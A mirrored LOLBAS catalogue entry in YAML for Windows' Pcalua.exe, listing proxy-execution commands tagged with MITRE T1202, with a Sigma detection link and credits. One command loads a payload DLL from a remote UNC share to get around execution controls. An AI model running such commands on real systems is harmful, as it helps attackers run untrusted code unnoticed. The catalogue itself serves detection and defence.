mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-29 00:08:11 +01:00
23dd0236ae
* Add detection links for scripts * Add detection links for OtherMSBins. Fixed and updated as needed. * Add detection links for MSBins. Fixed and updated as needed. * Add detection links for oslibraries * Updating template for Detections * Removing empty Detection:Sigma entries * Remove redundant blank line * Replacing commit URL with file URL Co-authored-by: root <root@DESKTOP-5CR935D.localdomain> Co-authored-by: Wietze <wietze@users.noreply.github.com>
42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
---
|
|
Name: Pcalua.exe
|
|
Description: Program Compatibility Assistant
|
|
Author: 'Oddvar Moe'
|
|
Created: 2018-05-25
|
|
Commands:
|
|
- Command: pcalua.exe -a calc.exe
|
|
Description: Open the target .EXE using the Program Compatibility Assistant.
|
|
Usecase: Proxy execution of binary
|
|
Category: Execute
|
|
Privileges: User
|
|
MitreID: T1202
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
- Command: pcalua.exe -a \\server\payload.dll
|
|
Description: Open the target .DLL file with the Program Compatibilty Assistant.
|
|
Usecase: Proxy execution of remote dll file
|
|
Category: Execute
|
|
Privileges: User
|
|
MitreID: T1202
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
|
|
Description: Open the target .CPL file with the Program Compatibility Assistant.
|
|
Usecase: Execution of CPL files
|
|
Category: Execute
|
|
Privileges: User
|
|
MitreID: T1202
|
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
|
Full_Path:
|
|
- Path: C:\Windows\System32\pcalua.exe
|
|
Code_Sample:
|
|
- Code:
|
|
Detection:
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml
|
|
Resources:
|
|
- Link: https://twitter.com/KyleHanslovan/status/912659279806640128
|
|
Acknowledgement:
|
|
- Person: Kyle Hanslovan
|
|
Handle: '@kylehanslovan'
|
|
- Person: Fab
|
|
Handle: '@0rbz_'
|
|
---
|